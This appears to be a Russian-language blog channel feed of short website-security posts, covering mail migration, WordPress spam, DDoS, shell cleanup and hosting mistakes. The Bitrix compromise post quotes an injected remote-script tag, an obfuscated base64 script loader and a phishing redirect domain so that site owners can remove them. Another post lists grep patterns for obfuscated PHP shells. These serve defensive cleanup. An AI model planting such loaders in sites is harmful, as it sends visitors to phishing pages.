Найти в Дзене
Перенос почты с любого почтового ящика
Иногда может потребоваться перенос почты с одного почтового ящика на другой. Например, по каким-либо вы больше не хотите использовать почтовый ящик в почтовой системе gmail и хотите полностью от него отказаться, но там хранится важная переписка и в идеале вам бы не хотелось ее потерять. Что же делать ? На помощь нам приходит замечательная утилита imapsync, которая позволяет перенести все письма с любого почтового сервиса, на любой другой сервис. Данный пример рассмотрен для операционной системы Linux (Ubuntu 20...
3 года назад
Борьба со СПАМ записями на примере CMS Wordpress
Появление нежелательной информации на сайте всегда несет в себе крайне негативные последствия для владельца веб ресурса. Например, сгенерированный злоумышленником контент может попасть под индексацию поисковой системы и вызвать появление не релевантных страниц на сайте, а в некоторых случаях даже вызвать блокировку со стороны поисковой системы (попадание сайта в черный список). Каким образом может генерироваться нежелательная спам запись? Рассмотрим конкретную ситуацию на примере популярной CMS wordpress...
3 года назад
Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500). Как должен был работать данный сценарий: Злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js. В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из поисковой системы в первые за сутки, то открывается URL-адрес otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов. Как исправить ? Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться) Также нужно проверить наличие в файлах: bitrix/js/main/core/core.js bitrix/templates/cm_main/js/jquery-1.10.2.min.js Подобной строки: s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s); Ее также следует удалить. В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».
3 года назад
Наиболее распространенные ошибки администратора веб-ресурса
При заражении ресурса вредоносным содержимым у владельца сайта появляется множество неприятных хлопот. Казалось бы недавно работающий и приносящий прибыль ресурс перестает быть таковым и в некоторых случаях начинает работать в убыток. Поисковые системы перестают индексировать сайт, вместо корректного описания в поисковой выдаче потенциальные клиенты наблюдают неприятное сообщение: Сайт может угрожать безопасности вашего компьютера или мобильного устройства. Не стоит объяснять какой будет реакция...
3 года назад
DDoS-атака. Что это такое ?
DDoS-атака - это попытка злоумышленником нарушить нормальный трафик целевого сервера, сети или конкретного сайта путем перегрузки цели или окружающей ее инфраструктуры потоком интернет-трафика. DDoS-атаки достигают эффективности за счет использования множества скомпрометированных компьютерных систем в качестве источников атакующего трафика. Эксплуатируемые удаленные машины могут включать компьютеры и другие сетевые ресурсы, например устройства Интернета вещей. Если немного абстрагироваться, то...
3 года назад
Создаем произведения искусства бесплатно без регистрации
В этой статье пойдет речь о нейронных сетях. Вы наверняка не раз натыкались на пестрящие заголовки новостных лент о том, что такая-то компания создала очередную нейронную сеть позволяющую делать невероятные вещи. Например, как вам такое, нейросеть для предсказания структуры белков, которая называется AlphaFold. Автопилоты для автомобилей, синтез речи, генерация музыки, распознавание лиц, анализ и установление различных закономерностей в на финансовом рынке. В общем, где только нейросети не преуспели...
3 года назад
Быстрый поиск шеллов в joomla, wordpress и dle (wp-conf.php, index_backup.php)
Если вы знакомы с ssh и командной строкой Linux(unix), и ваши сайты на joomla, wordpress, dle взломали в автоматическом режиме (обычно при этом появляются wp-conf.php, index_backup.php и .htaccess файлы с редиректами на index_backup.php), приведенный ниже список команд позволит вам быстро найти и удалить большую часть шеллов: find . -name '*.php' -exec grep -l '$msg=@gzinflate(@base64_decode(@str_replace' {} \; > rem01.txt find ./images/ -name '*.php' > rem02.txt find . -name '*.php' -exec grep -l 'preg_replace("/\...
3 года назад
Профилактика безопасности сайта
Для того, чтобы сайт работал стабильно и приносил определенную выгоду, необходимо постоянно следить за общим уровнем безопасности на нем, если игнорировать профилактические меры, владелец сайта может столкнуться с широким рядом проблем. К таким проблемам можно отнести: Важно понимать, что если своевременно проводить профилактический работы по обеспечению безопасности, то можно снизить вероятность взлома ресурса. В эти...
3 года назад
Оптимизация работы сайта
Бывает такое, что сайт, загруженный на хостинг, начинает открываться в браузере с длительными временными задержками. В большинстве случаев причиной такого поведения является плохая оптимизация контента. Чтобы ускорить сайт, необходимо провести грамотные работы по его оптимизации. Диагностика скорости загрузки сайта Для проведения теста скорости сайта и поиска проблемных мест можно воспользоваться инструментом от компании Google - Pagespeed Insights. Данный инструмент, в результате запроса показывает различные метрики с подсказками...
3 года назад
Почему сканеры вредоносного кода детектируют не все вирусы на сайте
Сканирование сайта автоматизированными средствами – необходимая, но недостаточная мера для выявления проблем безопасности. Возможно, кого-то это удивит, но специализированные сканеры, какие бы хорошие они ни были, не могут найти 100% вредоносного кода на сайте. Дело в том, что часть вирусных вставок или хакерских скриптов можно обнаружить только в результате ручного анализа...
3 года назад
Небезопасная статика Многие хостинг компании в целях оптимизации и снижения нагрузки на сервер настраивают отдачу статических файлов через nginx. То есть все картинки, архивы и документы улетают браузеру в обход Apache. Все хорошо до тех пор, пока вы не пожелаете ограничить прямой доступ к статическим файлам (например, .pdf, .doc или .zip). Например, для подсчета скачиваний вы можете выгружать файлы через .php скрипт или ограничить доступ к документам, предоставив его только определенной группе людей (платным подписчикам). Как обычно блокируется доступ к файлам на хостинге? Для блокировки прямого скачивания на виртуальном хостинге достаточно закрыть доступ к директории через .htaccess: Order Deny,Allow Deny from AllЛибо можно использовать mod_rewrite. Но варианты с .htaccess в случае статической обработки в nginx работать не будут, так как .htaccess обрабатывается в Apache, а статические файлы будут как ни в чем не бывало возвращаться nginx’ом и будут по-прежнему доступны по прямой ссылке. Так что будьте внимательны, если у вас на сайте есть файлы не для публичного скачивания. Если средства виритуального хостинга позволяют блокировать доступ к директориям через панель управления хостингом, воспользуйтесь данной возможностью.
3 года назад
Приколы на хостинге (спойлер невеселые) Очень часто специалисты поддержки хостинг провайдеров совершают действия, которых сводят на нет все попытки защитить сайт от взлома. Ниже приводим ТОП-5 действий, с которые чаще всего делают специалисты техпо: 1. По запросу клиента сделать дамп БД результат создается и размещается в каталоге public_html (www) и называется обычно dump.sql 2. Для проверки внесенных изменений в php.ini в корне создается файл phpinfo.php, i.php, info.php и не удаляется. 3. По запросу клиента сделать бэкап сайта последний создается с именем backup.tar.gz или backup-<дата>.tar.gz непосредственно в каталоге public_html (www) 4. Иногда без предупреждения хостер может сделать все файлы и каталоги с дефолтными правами 0755 / 0644, несмотря на то, что до этого они были установлены особым образом 5. Некоторые российские хостеры из ТОП-10 очень удивляют, забывая обо всех возможностях, которые у них есть. Например, о том, что файл php.ini все-таки можно редактировать на виртуальных тарифах, или что php можно переключать в различные режимы. Кстати, вопросы для самопроверки: как следовало бы поступать хостерам в пунктах 1-4 и почему? Пишите свои ответы в комментариях.
3 года назад